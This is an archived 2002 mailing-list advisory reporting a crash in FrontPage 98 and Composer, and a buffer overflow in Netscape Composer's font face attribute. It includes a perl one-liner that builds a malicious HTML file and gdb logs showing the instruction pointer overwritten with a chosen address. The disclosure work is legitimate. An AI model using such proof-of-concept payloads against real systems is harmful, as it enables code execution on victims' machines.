Microsoft FrontPage vs Composer Netscape...

From: S[h]iff - [ISR] - Infobyte Security Research (sh1ffat_private)
Date: Thu Jun 13 2002 - 04:31:03 PDT

  • Next message: Jon Keating: "RE: remote DoS in Mozilla 1.0"

    :::                [ISR]                 :::
    ::: Infobyte Security Research :::
     ::     ::
    .::Software Affected: 
     - Microsoft FrontPage 98 
     - Composer, Netscape 4.77/U.S ..(< or > ??)..
    .::Type of Problem:
     - Design Error
     - Buffer Overflow
    * Design Error:
    When a file in HTML is created that contains
    for example;
    <font face="">Hola!</font>
    The FrontPage and Composer crash, 
    for a bad manipulation <font face="">
    (blank arguments).
    * Buffer Overflow :
    The Composer contains uncheck buffer
    in the label face, if you put a argument
    of >=191 bytes write part of memory
    for example;
    <font face="AAAAAAAAAAAA..[191]">Hola!</font>
    (A >= 191)
    [ gdb logs ]
    (gdb) set args '-composer'
    (gdb) run
    Starting program: /usr/bin/netscape '-composer'
    Program received signal SIGSEGV, Segmentation fault.
    0x846e6bb in CEditElement::SetTagData () at eval.c:88
    (gdb) info all-registers
    eax            0x0      0
    ecx            0xffffffff       -1
    edx            0x90a3be0        151665632
    ebx            0x90a3be0        151665632
    esp            0xbfffe0d4       0xbfffe0d4
    ebp            0xbfffe0e4       0xbfffe0e4
    esi            0x12147820       303331360
    edi            0x12147820       303331360
    eip            0x846e6bb        0x846e6bb
    eflags         0x10246  66118
    *But the program begin to write ret address memory, when
    A if = 197 byte, check this !
    # printf "<html>\n</body>\n<font face=\"`perl -e 'printf "A"x197'``perl -e 
    'printf "\x78\x56\x34\x12"'`\"> Hola! </font>\n</body>\n</html>" >> source.htm
    source.htm created contains ;
    <font face="AAAAAAAAAAAA..[197][ret address 0x12345678]">Hola!</font>
    [ gdb logs ]
    # gdb netscape
    (gdb) set args '-composer'
    (gdb) run
    Starting program: /usr/bin/netscape '-composer'
     * "Here = does the program loaded the html file with AAA.. in the face args"
    Program received signal SIGSEGV, Segmentation fault.
    [[0x12345678]] in ?? () at eval.c:88
    (gdb) info all-registers
    eax            0x9003e22        151010850
    ecx            0x0      0
    edx            0x25c00900       633342208
    ebx            0x90a39a0        151665056
    esp            0xbfffe0c0       0xbfffe0c0
    [ebp            0x41414141       0x41414141]
    esi            0x90d6000        151871488
    edi            0xbfffe0ec       -1073749780
    [eip            0x12345678       0x12345678]
    eflags         0x10246  66118
    I check this b0fs in Slackware 8.0, and the netscape isn't installed setuid 
    root by default.
    I didn't check other distributions
    Sorry for my poor English.
    Salutes  ``S[h]iff``
    [ISR] - Crew! Mal0r..

    This archive was generated by hypermail 2b30 : Thu Jun 13 2002 - 17:15:47 PDT